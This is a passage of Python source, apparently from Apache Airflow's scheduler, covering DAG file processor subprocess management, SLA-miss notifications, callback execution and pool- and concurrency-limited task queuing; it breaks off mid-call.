self._process: Optional[multiprocessing.process.BaseProcess] = None
# The result of DagFileProcessor.process_file(file_path).
self._result: Optional[Tuple[int, int]] = None
# Whether the process is done running.
self._done = False
# When the process started.
self._start_time: Optional[datetime.datetime] = None
# This ID is used to uniquely name the process / thread that's launched
# by this processor instance
self._instance_id = DagFileProcessorProcess.class_creation_counter
self._parent_channel: Optional[MultiprocessingConnection] = None
DagFileProcessorProcess.class_creation_counter += 1
@property
def file_path(self) -> str:
return self._file_path
@staticmethod
def _run_file_processor(
result_channel: MultiprocessingConnection,
parent_channel: MultiprocessingConnection,
file_path: str,
pickle_dags: bool,
dag_ids: Optional[List[str]],
thread_name: str,
callback_requests: List[CallbackRequest],
) -> None:
"""
Process the given file.
:param result_channel: the connection to use for passing back the result
:type result_channel: multiprocessing.Connection
:param parent_channel: the parent end of the channel to close in the child
:type parent_channel: multiprocessing.Connection
:param file_path: the file to process
:type file_path: str
:param pickle_dags: whether to pickle the DAGs found in the file and
save them to the DB
:type pickle_dags: bool
:param dag_ids: if specified, only examine DAG ID's that are
in this list
:type dag_ids: list[str]
:param thread_name: the name to use for the process that is launched
:type thread_name: str
:param callback_requests: failure callback to execute
:type callback_requests: List[airflow.utils.callback_requests.CallbackRequest]
:return: None; the result is sent back to the parent over ``result_channel``
:rtype: None
"""
# This helper runs in the newly created process
log: logging.Logger = logging.getLogger("airflow.processor")
# Since we share all open FDs from the parent, we need to close the parent side of the pipe here in
# the child, else it won't get closed properly until we exit.
log.info("Closing parent pipe")
parent_channel.close()
del parent_channel
set_context(log, file_path)
setproctitle(f"airflow scheduler - DagFileProcessor {file_path}")
try:
# redirect stdout/stderr to log
with redirect_stdout(StreamLogWriter(log, logging.INFO)), redirect_stderr(
StreamLogWriter(log, logging.WARN)
), Stats.timer() as timer:
# Re-configure the ORM engine as there are issues with multiple processes
settings.configure_orm()
# Change the thread name to differentiate log lines. This is
# really a separate process, but changing the name of the
# process doesn't work, so changing the thread name instead.
threading.current_thread().name = thread_name
log.info("Started process (PID=%s) to work on %s", os.getpid(), file_path)
dag_file_processor = DagFileProcessor(dag_ids=dag_ids, log=log)
result: Tuple[int, int] = dag_file_processor.process_file(
file_path=file_path,
pickle_dags=pickle_dags,
callback_requests=callback_requests,
)
result_channel.send(result)
log.info("Processing %s took %.3f seconds", file_path, timer.duration)
except Exception: # pylint: disable=broad-except
# Log exceptions through the logging framework.
log.exception("Got an exception! Propagating...")
raise
finally:
# We re-initialized the ORM within this Process above so we need to
# tear it down manually here
settings.dispose_orm()
result_channel.close()
def start(self) -> None:
"""Launch the process and start processing the DAG."""
start_method = self._get_multiprocessing_start_method()
context = multiprocessing.get_context(start_method)
_parent_channel, _child_channel = context.Pipe(duplex=False)
process = context.Process(
target=type(self)._run_file_processor,
args=(
_child_channel,
_parent_channel,
self.file_path,
self._pickle_dags,
self._dag_ids,
f"DagFileProcessor{self._instance_id}",
self._callback_requests,
),
name=f"DagFileProcessor{self._instance_id}-Process",
)
self._process = process
self._start_time = timezone.utcnow()
process.start()
# Close the child side of the pipe now the subprocess has started -- otherwise this would prevent it
# from closing in some cases
_child_channel.close()
del _child_channel
# Don't store it on self until after we've started the child process - we don't want to keep it from
# getting GCd/closed
self._parent_channel = _parent_channel
def kill(self) -> None:
"""Kill the process launched to process the file, and ensure consistent state."""
if self._process is None:
raise AirflowException("Tried to kill before starting!")
self._kill_process()
def terminate(self, sigkill: bool = False) -> None:
"""
Terminate (and then kill) the process launched to process the file.
:param sigkill: whether to issue a SIGKILL if SIGTERM doesn't work.
:type sigkill: bool
"""
if self._process is None or self._parent_channel is None:
raise AirflowException("Tried to call terminate before starting!")
self._process.terminate()
# Arbitrarily wait 5s for the process to die
with suppress(TimeoutError):
self._process._popen.wait(5) # type: ignore # pylint: disable=protected-access
if sigkill:
self._kill_process()
self._parent_channel.close()
def _kill_process(self) -> None:
if self._process is None:
raise AirflowException("Tried to kill process before starting!")
if self._process.is_alive() and self._process.pid:
self.log.warning("Killing DAGFileProcessorProcess (PID=%d)", self._process.pid)
os.kill(self._process.pid, signal.SIGKILL)
if self._parent_channel:
self._parent_channel.close()
@property
def pid(self) -> int:
"""
:return: the PID of the process launched to process the given file
:rtype: int
"""
if self._process is None or self._process.pid is None:
raise AirflowException("Tried to get PID before starting!")
return self._process.pid
@property
def exit_code(self) -> Optional[int]:
"""
After the process is finished, this can be called to get the return code
:return: the exit code of the process
:rtype: int
"""
if self._process is None:
raise AirflowException("Tried to get exit code before starting!")
if not self._done:
raise AirflowException("Tried to call retcode before process was finished!")
return self._process.exitcode
@property
def done(self) -> bool:
"""
Check if the process launched to process this file is done.
:return: whether the process is finished running
:rtype: bool
"""
if self._process is None or self._parent_channel is None:
raise AirflowException("Tried to see if it's done before starting!")
if self._done:
return True
if self._parent_channel.poll():
try:
self._result = self._parent_channel.recv()
self._done = True
self.log.debug("Waiting for %s", self._process)
self._process.join()
self._parent_channel.close()
return True
except EOFError:
# If we get an EOFError, it means the child end of the pipe has been closed. This only happens
# in the finally block. But due to a possible race condition, the process may have not yet
# terminated (it could be doing cleanup/python shutdown still). So we kill it here after a
# "suitable" timeout.
self._done = True
# Arbitrary timeout -- error/race condition only, so this doesn't need to be tunable.
self._process.join(timeout=5)
if self._process.is_alive():
# Didn't shut down cleanly - kill it
self._kill_process()
if not self._process.is_alive():
self._done = True
self.log.debug("Waiting for %s", self._process)
self._process.join()
self._parent_channel.close()
return True
return False
@property
def result(self) -> Optional[Tuple[int, int]]:
"""
:return: result of running DagFileProcessor.process_file()
:rtype: tuple[int, int] or None
"""
if not self.done:
raise AirflowException("Tried to get the result before it's done!")
return self._result
@property
def start_time(self) -> datetime.datetime:
"""
:return: when this started to process the file
:rtype: datetime
"""
if self._start_time is None:
raise AirflowException("Tried to get start time before it started!")
return self._start_time
@property
def waitable_handle(self):
return self._process.sentinel
class DagFileProcessor(LoggingMixin):
"""
Process a Python file containing Airflow DAGs.
This includes:
1. Execute the file and look for DAG objects in the namespace.
2. Execute any Callbacks if passed to DagFileProcessor.process_file
3. Serialize the DAGs and save it to DB (or update existing record in the DB).
4. Pickle the DAG and save it to the DB (if necessary).
5. Record any errors importing the file into ORM
Returns a tuple of 'number of dags found' and 'the count of import errors'
:param dag_ids: If specified, only look at these DAG ID's
:type dag_ids: List[str]
:param log: Logger to save the processing process
:type log: logging.Logger
"""
UNIT_TEST_MODE: bool = conf.getboolean('core', 'UNIT_TEST_MODE')
def __init__(self, dag_ids: Optional[List[str]], log: logging.Logger):
super().__init__()
self.dag_ids = dag_ids
self._log = log
@provide_session
def manage_slas(self, dag: DAG, session: Session = None) -> None:
"""
Find all tasks that have SLAs defined and send alert emails where
needed. New SLA misses are also recorded in the database.
We assume that the scheduler runs often, so we only check for
tasks that should have succeeded in the past hour.
"""
self.log.info("Running SLA Checks for %s", dag.dag_id)
if not any(isinstance(ti.sla, timedelta) for ti in dag.tasks):
self.log.info("Skipping SLA check for %s because no tasks in DAG have SLAs", dag)
return
qry = (
session.query(TI.task_id, func.max(TI.execution_date).label('max_ti'))
.with_hint(TI, 'USE INDEX (PRIMARY)', dialect_name='mysql')
.filter(TI.dag_id == dag.dag_id)
.filter(or_(TI.state == State.SUCCESS, TI.state == State.SKIPPED))
.filter(TI.task_id.in_(dag.task_ids))
.group_by(TI.task_id)
.subquery('sq')
)
max_tis: List[TI] = (
session.query(TI)
.filter(
TI.dag_id == dag.dag_id,
TI.task_id == qry.c.task_id,
TI.execution_date == qry.c.max_ti,
)
.all()
)
ts = timezone.utcnow()
for ti in max_tis:
task = dag.get_task(ti.task_id)
if not isinstance(task.sla, timedelta):
continue
dttm = dag.following_schedule(ti.execution_date)
while dttm < timezone.utcnow():
following_schedule = dag.following_schedule(dttm)
if following_schedule + task.sla < timezone.utcnow():
session.merge(
SlaMiss(task_id=ti.task_id, dag_id=ti.dag_id, execution_date=dttm, timestamp=ts)
)
dttm = dag.following_schedule(dttm)
session.commit()
# pylint: disable=singleton-comparison
slas: List[SlaMiss] = (
session.query(SlaMiss)
.filter(SlaMiss.notification_sent == False, SlaMiss.dag_id == dag.dag_id) # noqa
.all()
)
# pylint: enable=singleton-comparison
if slas: # pylint: disable=too-many-nested-blocks
sla_dates: List[datetime.datetime] = [sla.execution_date for sla in slas]
fetched_tis: List[TI] = (
session.query(TI)
.filter(TI.state != State.SUCCESS, TI.execution_date.in_(sla_dates), TI.dag_id == dag.dag_id)
.all()
)
blocking_tis: List[TI] = []
for ti in fetched_tis:
if ti.task_id in dag.task_ids:
ti.task = dag.get_task(ti.task_id)
blocking_tis.append(ti)
else:
session.delete(ti)
session.commit()
task_list = "\n".join([sla.task_id + ' on ' + sla.execution_date.isoformat() for sla in slas])
blocking_task_list = "\n".join(
[ti.task_id + ' on ' + ti.execution_date.isoformat() for ti in blocking_tis]
)
# Track whether email or any alert notification sent
# We consider email or the alert callback as notifications
email_sent = False
notification_sent = False
if dag.sla_miss_callback:
# Execute the alert callback
self.log.info('Calling SLA miss callback')
try:
dag.sla_miss_callback(dag, task_list, blocking_task_list, slas, blocking_tis)
notification_sent = True
except Exception: # pylint: disable=broad-except
self.log.exception("Could not call sla_miss_callback for DAG %s", dag.dag_id)
email_content = f"""\
Here's a list of tasks that missed their SLAs:
<pre><code>{task_list}\n</code></pre>
Blocking tasks:
<pre><code>{blocking_task_list}</code></pre>
"""
tasks_missed_sla = []
for sla in slas:
try:
task = dag.get_task(sla.task_id)
except TaskNotFound:
# task already deleted from DAG, skip it
self.log.warning(
"Task %s doesn't exist in DAG anymore, skipping SLA miss notification.", sla.task_id
)
continue
tasks_missed_sla.append(task)
emails: Set[str] = set()
for task in tasks_missed_sla:
if task.email:
if isinstance(task.email, str):
emails |= set(get_email_address_list(task.email))
elif isinstance(task.email, (list, tuple)):
emails |= set(task.email)
if emails:
try:
send_email(emails, f"[airflow] SLA miss on DAG={dag.dag_id}", email_content)
email_sent = True
notification_sent = True
except Exception: # pylint: disable=broad-except
Stats.incr('sla_email_notification_failure')
self.log.exception("Could not send SLA Miss email notification for DAG %s", dag.dag_id)
# If we sent any notification, update the sla_miss table
if notification_sent:
for sla in slas:
sla.email_sent = email_sent
sla.notification_sent = True
session.merge(sla)
session.commit()
@staticmethod
def update_import_errors(session: Session, dagbag: DagBag) -> None:
"""
For the DAGs in the given DagBag, record any associated import errors and clear
errors for files that no longer have them. These are usually displayed through the
Airflow UI so that users know that there are issues parsing DAGs.
:param session: session for ORM operations
:type session: sqlalchemy.orm.session.Session
:param dagbag: DagBag containing DAGs with import errors
:type dagbag: airflow.DagBag
"""
# Clear the errors of the processed files
for dagbag_file in dagbag.file_last_changed:
session.query(errors.ImportError).filter(errors.ImportError.filename == dagbag_file).delete()
# Add the errors of the processed files
for filename, stacktrace in dagbag.import_errors.items():
session.add(
errors.ImportError(filename=filename, timestamp=timezone.utcnow(), stacktrace=stacktrace)
)
session.commit()
@provide_session
def execute_callbacks(
self, dagbag: DagBag, callback_requests: List[CallbackRequest], session: Session = None
) -> None:
"""
Execute on failure callbacks. These objects can come from SchedulerJob or from
DagFileProcessorManager.
:param dagbag: Dag Bag of dags
:param callback_requests: failure callbacks to execute
:type callback_requests: List[airflow.utils.callback_requests.CallbackRequest]
:param session: DB session.
"""
for request in callback_requests:
self.log.debug("Processing Callback Request: %s", request)
try:
if isinstance(request, TaskCallbackRequest):
self._execute_task_callbacks(dagbag, request)
elif isinstance(request, SlaCallbackRequest):
self.manage_slas(dagbag.dags.get(request.dag_id))
elif isinstance(request, DagCallbackRequest):
self._execute_dag_callbacks(dagbag, request, session)
except Exception: # pylint: disable=broad-except
self.log.exception(
"Error executing %s callback for file: %s",
request.__class__.__name__,
request.full_filepath,
)
session.commit()
@provide_session
def _execute_dag_callbacks(self, dagbag: DagBag, request: DagCallbackRequest, session: Session):
dag = dagbag.dags[request.dag_id]
dag_run = dag.get_dagrun(execution_date=request.execution_date, session=session)
dag.handle_callback(
dagrun=dag_run, success=not request.is_failure_callback, reason=request.msg, session=session
)
def _execute_task_callbacks(self, dagbag: DagBag, request: TaskCallbackRequest):
simple_ti = request.simple_task_instance
if simple_ti.dag_id in dagbag.dags:
dag = dagbag.dags[simple_ti.dag_id]
if simple_ti.task_id in dag.task_ids:
task = dag.get_task(simple_ti.task_id)
ti = TI(task, simple_ti.execution_date)
# Get properties needed for failure handling from SimpleTaskInstance.
ti.start_date = simple_ti.start_date
ti.end_date = simple_ti.end_date
ti.try_number = simple_ti.try_number
ti.state = simple_ti.state
ti.test_mode = self.UNIT_TEST_MODE
if request.is_failure_callback:
ti.handle_failure_with_callback(error=request.msg, test_mode=ti.test_mode)
self.log.info('Executed failure callback for %s in state %s', ti, ti.state)
@provide_session
def process_file(
self,
file_path: str,
callback_requests: List[CallbackRequest],
pickle_dags: bool = False,
session: Session = None,
) -> Tuple[int, int]:
"""
Process a Python file containing Airflow DAGs.
This includes:
1. Execute the file and look for DAG objects in the namespace.
2. Execute any Callbacks if passed to this method.
3. Serialize the DAGs and save it to DB (or update existing record in the DB).
4. Pickle the DAG and save it to the DB (if necessary).
5. Record any errors importing the file into ORM
:param file_path: the path to the Python file that should be executed
:type file_path: str
:param callback_requests: failure callback to execute
:type callback_requests: List[airflow.utils.dag_processing.CallbackRequest]
:param pickle_dags: whether to serialize the DAGs found in the file and
save them to the db
:type pickle_dags: bool
:param session: Sqlalchemy ORM Session
:type session: Session
:return: number of dags found, count of import errors
:rtype: Tuple[int, int]
"""
self.log.info("Processing file %s for tasks to queue", file_path)
try:
dagbag = DagBag(file_path, include_examples=False, include_smart_sensor=False)
except Exception: # pylint: disable=broad-except
self.log.exception("Failed at reloading the DAG file %s", file_path)
Stats.incr('dag_file_refresh_error', 1, 1)
return 0, 0
if len(dagbag.dags) > 0:
self.log.info("DAG(s) %s retrieved from %s", dagbag.dags.keys(), file_path)
else:
self.log.warning("No viable dags retrieved from %s", file_path)
self.update_import_errors(session, dagbag)
return 0, len(dagbag.import_errors)
self.execute_callbacks(dagbag, callback_requests)
# Save individual DAGs in the ORM
dagbag.sync_to_db()
if pickle_dags:
paused_dag_ids = DagModel.get_paused_dag_ids(dag_ids=dagbag.dag_ids)
unpaused_dags: List[DAG] = [
dag for dag_id, dag in dagbag.dags.items() if dag_id not in paused_dag_ids
]
for dag in unpaused_dags:
dag.pickle(session)
# Record import errors into the ORM
try:
self.update_import_errors(session, dagbag)
except Exception: # pylint: disable=broad-except
self.log.exception("Error logging import errors!")
return len(dagbag.dags), len(dagbag.import_errors)
class SchedulerJob(BaseJob): # pylint: disable=too-many-instance-attributes
"""
This SchedulerJob runs for a specific time interval and schedules the jobs
that are ready to run. It figures out the latest runs for each
task and sees if the dependencies for the next schedules are met.
If so, it creates appropriate TaskInstances and sends run commands to the
executor. It does this for each task in each DAG and repeats.
:param dag_id: if specified, only schedule tasks with this DAG ID
:type dag_id: str
:param dag_ids: if specified, only schedule tasks with these DAG IDs
:type dag_ids: list[str]
:param subdir: directory containing Python files with Airflow DAG
definitions, or a specific path to a file
:type subdir: str
:param num_runs: The number of times to run the scheduling loop. If you
have a large number of DAG files this could complete before each file
has been parsed. -1 for unlimited times.
:type num_runs: int
:param num_times_parse_dags: The number of times to try to parse each DAG file.
-1 for unlimited times.
:type num_times_parse_dags: int
:param processor_poll_interval: The number of seconds to wait between
polls of running processors
:type processor_poll_interval: int
:param do_pickle: once a DAG object is obtained by executing the Python
file, whether to serialize the DAG object to the DB
:type do_pickle: bool
"""
__mapper_args__ = {'polymorphic_identity': 'SchedulerJob'}
heartrate: int = conf.getint('scheduler', 'SCHEDULER_HEARTBEAT_SEC')
def __init__(
self,
subdir: str = settings.DAGS_FOLDER,
num_runs: int = conf.getint('scheduler', 'num_runs'),
num_times_parse_dags: int = -1,
processor_poll_interval: float = conf.getfloat('scheduler', 'processor_poll_interval'),
do_pickle: bool = False,
log: Any = None,
*args,
**kwargs,
):
self.subdir = subdir
self.num_runs = num_runs
# In specific tests, we want to stop the parse loop after the _files_ have been parsed a certain
# number of times. This is only to support testing, and isn't something a user is likely to want to
# configure -- they'll want num_runs
self.num_times_parse_dags = num_times_parse_dags
self._processor_poll_interval = processor_poll_interval
self.do_pickle = do_pickle
super().__init__(*args, **kwargs)
if log:
self._log = log
# Check what SQL backend we use
sql_conn: str = conf.get('core', 'sql_alchemy_conn').lower()
self.using_sqlite = sql_conn.startswith('sqlite')
self.using_mysql = sql_conn.startswith('mysql')
self.max_tis_per_query: int = conf.getint('scheduler', 'max_tis_per_query')
self.processor_agent: Optional[DagFileProcessorAgent] = None
self.dagbag = DagBag(dag_folder=self.subdir, read_dags_from_db=True, load_op_links=False)
def register_signals(self) -> None:
"""Register signals that stop child processes"""
signal.signal(signal.SIGINT, self._exit_gracefully)
signal.signal(signal.SIGTERM, self._exit_gracefully)
signal.signal(signal.SIGUSR2, self._debug_dump)
def _exit_gracefully(self, signum, frame) -> None: # pylint: disable=unused-argument
"""Helper method to clean up processor_agent to avoid leaving orphan processes."""
self.log.info("Exiting gracefully upon receiving signal %s", signum)
if self.processor_agent:
self.processor_agent.end()
sys.exit(os.EX_OK)
def _debug_dump(self, signum, frame): # pylint: disable=unused-argument
try:
sig_name = signal.Signals(signum).name # pylint: disable=no-member
except Exception: # pylint: disable=broad-except
sig_name = str(signum)
self.log.info("%s\n%s received, printing debug\n%s", "-" * 80, sig_name, "-" * 80)
self.executor.debug_dump()
self.log.info("-" * 80)
def is_alive(self, grace_multiplier: Optional[float] = None) -> bool:
"""
Is this SchedulerJob alive?
We define alive as in a state of running and a heartbeat within the
threshold defined in the ``scheduler_health_check_threshold`` config
setting.
``grace_multiplier`` is accepted for compatibility with the parent class.
:rtype: boolean
"""
if grace_multiplier is not None:
# Accept the same behaviour as superclass
return super().is_alive(grace_multiplier=grace_multiplier)
scheduler_health_check_threshold: int = conf.getint('scheduler', 'scheduler_health_check_threshold')
return (
self.state == State.RUNNING
and (timezone.utcnow() - self.latest_heartbeat).total_seconds() < scheduler_health_check_threshold
)
@provide_session
def _change_state_for_tis_without_dagrun(
self, old_states: List[str], new_state: str, session: Session = None
) -> None:
"""
For all DAG IDs in the DagBag, look for task instances in the
old_states and set them to new_state if the corresponding DagRun
does not exist or exists but is not in the running state. This
normally should not happen, but it can if the state of DagRuns is
changed manually.
:param old_states: examine TaskInstances in this state
:type old_states: list[airflow.utils.state.State]
:param new_state: set TaskInstances to this state
:type new_state: airflow.utils.state.State
"""
tis_changed = 0
query = (
session.query(models.TaskInstance)
.outerjoin(models.TaskInstance.dag_run)
.filter(models.TaskInstance.dag_id.in_(list(self.dagbag.dag_ids)))
.filter(models.TaskInstance.state.in_(old_states))
.filter(
or_(
# pylint: disable=comparison-with-callable
models.DagRun.state != State.RUNNING,
# pylint: disable=no-member
models.DagRun.state.is_(None),
)
)
)
# We need to do this for mysql as well because it can cause deadlocks
# as discussed in https://issues.apache.org/jira/browse/AIRFLOW-2516
if self.using_sqlite or self.using_mysql:
tis_to_change: List[TI] = with_row_locks(
query, of=TI, session=session, **skip_locked(session=session)
).all()
for ti in tis_to_change:
ti.set_state(new_state, session=session)
tis_changed += 1
else:
subq = query.subquery()
current_time = timezone.utcnow()
ti_prop_update = {
models.TaskInstance.state: new_state,
models.TaskInstance.start_date: current_time,
}
# Only add end_date and duration if the new_state is 'success', 'failed' or 'skipped'
if new_state in State.finished:
ti_prop_update.update(
{
models.TaskInstance.end_date: current_time,
models.TaskInstance.duration: 0,
}
)
tis_changed = (
session.query(models.TaskInstance)
.filter(
models.TaskInstance.dag_id == subq.c.dag_id,
models.TaskInstance.task_id == subq.c.task_id,
models.TaskInstance.execution_date == subq.c.execution_date,
)
.update(ti_prop_update, synchronize_session=False)
)
if tis_changed > 0:
session.flush()
self.log.warning(
"Set %s task instances to state=%s as their associated DagRun was not in RUNNING state",
tis_changed,
new_state,
)
Stats.gauge('scheduler.tasks.without_dagrun', tis_changed)
@provide_session
def __get_concurrency_maps(
self, states: List[str], session: Session = None
) -> Tuple[DefaultDict[str, int], DefaultDict[Tuple[str, str], int]]:
"""
Get the concurrency maps.
:param states: List of states to query for
:type states: list[airflow.utils.state.State]
:return: A map from dag_id to # of task instances and
a map from (dag_id, task_id) to # of task instances in the given state list
:rtype: tuple[dict[str, int], dict[tuple[str, str], int]]
"""
ti_concurrency_query: List[Tuple[str, str, int]] = (
session.query(TI.task_id, TI.dag_id, func.count('*'))
.filter(TI.state.in_(states))
.group_by(TI.task_id, TI.dag_id)
).all()
dag_map: DefaultDict[str, int] = defaultdict(int)
task_map: DefaultDict[Tuple[str, str], int] = defaultdict(int)
for result in ti_concurrency_query:
task_id, dag_id, count = result
dag_map[dag_id] += count
task_map[(dag_id, task_id)] = count
return dag_map, task_map
# pylint: disable=too-many-locals,too-many-statements
@provide_session
def _executable_task_instances_to_queued(self, max_tis: int, session: Session = None) -> List[TI]:
"""
Finds TIs that are ready for execution with respect to pool limits,
dag concurrency, executor state, and priority.
:param max_tis: Maximum number of TIs to queue in this loop.
:type max_tis: int
:return: list[airflow.models.TaskInstance]
"""
executable_tis: List[TI] = []
# Get the pool settings. We get a lock on the pool rows, treating this as a "critical section"
# Throws an exception if lock cannot be obtained, rather than blocking
pools = models.Pool.slots_stats(lock_rows=True, session=session)
# If the pools are full, there is no point doing anything!
# If _somehow_ the pool is overfull, don't let the limit go negative - it breaks SQL
pool_slots_free = max(0, sum(pool['open'] for pool in pools.values()))
if pool_slots_free == 0:
self.log.debug("All pools are full!")
return executable_tis
max_tis = min(max_tis, pool_slots_free)
# Get all task instances associated with scheduled
# DagRuns which are not backfilled, in the given states,
# and the dag is not paused
query = (
session.query(TI)
.outerjoin(TI.dag_run)
.filter(or_(DR.run_id.is_(None), DR.run_type != DagRunType.BACKFILL_JOB))
.join(TI.dag_model)
.filter(not_(DM.is_paused))
.filter(TI.state == State.SCHEDULED)
.options(selectinload('dag_model'))
.limit(max_tis)
)
task_instances_to_examine: List[TI] = with_row_locks(
query,
of=TI,
session=session,
**skip_locked(session=session),
).all()
# TODO[HA]: This was wrong before anyway, as it only looked at a sub-set of dags, not everything.
# Stats.gauge('scheduler.tasks.pending', len(task_instances_to_examine))
if len(task_instances_to_examine) == 0:
self.log.debug("No tasks to consider for execution.")
return executable_tis
# Put one task instance on each line
task_instance_str = "\n\t".join([repr(x) for x in task_instances_to_examine])
self.log.info("%s tasks up for execution:\n\t%s", len(task_instances_to_examine), task_instance_str)
pool_to_task_instances: DefaultDict[str, List[models.Pool]] = defaultdict(list)
for task_instance in task_instances_to_examine:
pool_to_task_instances[task_instance.pool].append(task_instance)
# dag_id to # of running tasks and (dag_id, task_id) to # of running tasks.
dag_concurrency_map: DefaultDict[str, int]
task_concurrency_map: DefaultDict[Tuple[str, str], int]
dag_concurrency_map, task_concurrency_map = self.__get_concurrency_maps(
states=list(EXECUTION_STATES), session=session
)
num_tasks_in_executor = 0
# Number of tasks that cannot be scheduled because of no open slot in pool
num_starving_tasks_total = 0
# Go through each pool, and queue up a task for execution if there are
# any open slots in the pool.
# pylint: disable=too-many-nested-blocks
for pool, task_instances in pool_to_task_instances.items():
pool_name = pool
if pool not in pools:
self.log.warning("Tasks using non-existent pool '%s' will not be scheduled", pool)
continue
open_slots = pools[pool]["open"]
num_ready = len(task_instances)
self.log.info(
"Figuring out tasks to run in Pool(name=%s) with %s open slots "
"and %s task instances ready to be queued",
pool,
open_slots,
num_ready,
)
priority_sorted_task_instances = sorted(
task_instances, key=lambda ti: (-ti.priority_weight, ti.execution_date)
)
num_starving_tasks = 0
for current_index, task_instance in enumerate(priority_sorted_task_instances):
if open_slots <= 0:
self.log.info("Not scheduling since there are %s open slots in pool %s", open_slots, pool)
# Can't schedule any more since there are no more open slots.
num_unhandled = len(priority_sorted_task_instances) - current_index
num_starving_tasks += num_unhandled
num_starving_tasks_total += num_unhandled
break
# Check to make sure that the task concurrency of the DAG hasn't been
# reached.
dag_id = task_instance.dag_id
current_dag_concurrency = dag_concurrency_map[dag_id]
dag_concurrency_limit = task_instance.dag_model.concurrency
self.log.info(
"DAG %s has %s/%s running and queued tasks",
dag_id,
current_dag_concurrency,
dag_concurrency_limit,
)
if current_dag_concurrency >= dag_concurrency_limit:
self.log.info(
"Not executing %s since the number of tasks running or queued "
"from DAG %s is >= to the DAG's task concurrency limit of %s",
task_instance,
dag_id,
dag_concurrency_limit,
)
continue
task_concurrency_limit: Optional[int] = None
if task_instance.dag_model.has_task_concurrency_limits:
# Many dags don't have a task_concurrency, so we avoid loading the full
# serialized DAG where we can.
serialized_dag = self.dagbag.get_dag(dag_id, session=session)
if serialized_dag.has_task(task_instance.task_id):
task_concurrency_limit = serialized_dag.get_task(
task_instance.task_id
).task_concurrency
if task_concurrency_limit is not None:
current_task_concurrency = task_concurrency_map[
(task_instance.dag_id, task_instance.task_id)
]
if current_task_concurrency >= task_concurrency_limit:
self.log.info(
"Not executing %s since the task concurrency for"
" this task has been reached.",
task_instance,
)
continue
if task_instance.pool_slots > open_slots:
self.log.info(
"Not executing %s since it requires %s slots "
"but there are %s open slots in the pool %s.",
task_instance,
task_instance.pool_slots,
open_slots,
pool,
)
num_starving_tasks += 1
num_starving_tasks_total += 1
# Though we can execute tasks with lower priority if there's enough room
continue
executable_tis.append(task_instance)
open_slots -= task_instance.pool_slots
dag_concurrency_map[dag_id] += 1
task_concurrency_map[(task_instance.dag_id, task_instance.task_id)] += 1
Stats.gauge(f'pool.starving_tasks.{pool_name}', num_starving_tasks)
Stats.gauge('scheduler.tasks.starving', num_starving_tasks_total)
Stats.gauge('scheduler.tasks.running', num_tasks_in_executor)
Stats.gauge('scheduler.tasks.executable', len(executable_tis))
task_instance_str = "\n\t".join([repr(x) for x in executable_tis])
self.log.info("Setting the following tasks to queued state:\n\t%s", task_instance_str)
# set TIs to queued state
filter_for_tis = TI.filter_for_tis(executable_tis)
session.query(TI).filter(filter_for_tis).update(
# TODO[ha]: should we use func.now()? How does that work with DB timezone on mysql when it's not
# UTC?
{TI.state: State.QUEUED, TI.queued_dttm: timezone.utcnow(), TI.queued_by_job_id: self.id},
synchronize_session=False,
)
for ti in executable_tis:
make_transient(ti)
return executable_tis
def _enqueue_task_instances_with_queued_state(self, task_instances: List[TI]) -> None:
"""
Takes task_instances, which should have been set to queued, and enqueues them
with the executor.
:param task_instances: TaskInstances to enqueue
:type task_instances: list[TaskInstance]
"""
# actually enqueue them
for ti in task_instances:
command = TI.generate_command(
ti.dag_id,
ti.task_id,
ti.execution_date,
local=True,
mark_success=False,
ignore_all_deps=False,
ignore_depends_on_past=False,
ignore_task_deps=False,
ignore_ti_state=False,
pool=ti.pool,
file_path=ti.dag_model.fileloc,
pickle_id=ti.dag_model.pickle_id,
)
priority = ti.priority_weight
queue = ti.queue
self.log.info("Sending %s to executor with priority %s and queue %s", ti.key, priority, queue)
self.executor.queue_command(
ti,
command,
priority=priority,
queue=queue,
)
def _critical_section_execute_task_instances(self, session: Session) -> int:
"""
Attempts to execute TaskInstances that should be executed by the scheduler.
There are three steps:
1. Pick TIs by priority with the constraint that they are in the expected states
and that we do not exceed max_active_runs or pool limits.
2. Change the state for the TIs above atomically.
3. Enqueue the TIs in the executor.
HA note: This function is a "critical section" meaning that only a single executor process can execute
this function at the same time. This is achieved by doing ``SELECT ... from pool FOR UPDATE``. For DBs
that support NOWAIT, a "blocked" scheduler will skip this and continue on with other tasks (creating
new DAG runs, progressing TIs from None to SCHEDULED etc.); for DBs that don't support this (such as
MariaDB or MySQL 5.x), the other schedulers will wait for the lock before continuing.
:param session:
:type session: sqlalchemy.orm.Session
:return: Number of task instance with state changed.
"""
if self.max_tis_per_query == 0:
max_tis = self.executor.slots_available
else:
max_tis = min(self.max_tis_per_query, self.executor.slots_available)
queued_tis = self._executable_task_instances_to_queued(max_tis, session=session)
self._enqueue_task_instances_with_queued_state(queued_tis)
return len(queued_tis)
@provide_session
def _change_state_for_tasks_failed_to_execute(self, session: Session = None):
"""
If there are tasks left over in the executor,
we set them back to SCHEDULED to avoid creating hanging tasks.
:param session: session for ORM operations
"""
if not self.executor.queued_tasks:
return
filter_for_ti_state_change = [
and_(
TI.dag_id == dag_id,
TI.task_id == task_id,
TI.execution_date == execution_date,
# TI.try_number returns the raw try_number + 1 while the
# ti is not running, so we subtract 1 to match the DB record.
TI._try_number == try_number - 1, # pylint: disable=protected-access
TI.state == State.QUEUED,
)
for dag_id, task_id, execution_date, try_number in self.executor.queued_tasks.keys()
]
ti_query = session.query(TI).filter(or_(*filter_for_ti_state_change))
tis_to_set_to_scheduled: List[TI] = with_row_locks(ti_query, session=session).all()
if not tis_to_set_to_scheduled:
return
# set TIs to queued state
filter_for_tis = TI.filter_for_tis(tis_to_set_to_scheduled)
session.query(TI).filter(filter_for_tis).update(
{TI.state: State.SCHEDULED, TI.queued_dttm: None}, synchronize_session=False
)
for task_instance in tis_to_set_to_scheduled:
self.executor.queued_tasks.pop(task_instance.key)
task_instance_str = "\n\t".join(repr(x) for x in tis_to_set_to_scheduled)
self.log.info("Set the following tasks to scheduled state:\n\t%s", task_instance_str)
@provide_session
def _process_executor_events(self, session: Session = None) -> int:
"""Respond to executor events."""
if not self.processor_agent:
raise ValueError("Processor agent is not started.")
ti_primary_key_to_try_number_map: Dict[Tuple[str, str, datetime.datetime], int] = {}
event_buffer = self.executor.get_event_buffer()
tis_with_right_state: List[TaskInstanceKey] = []
# Report execution
for ti_key, value in event_buffer.items():
state: str
state, _ = value
# We create map (dag_id, task_id, execution_date) -> in-memory try_number
ti_primary_key_to_try_number_map[ti_key.primary] = ti_key.try_number
self.log.info(
"Executor reports execution of %s.%s execution_date=%s "
"exited with status %s for try_number %s",
ti_key.dag_id,
ti_key.task_id,
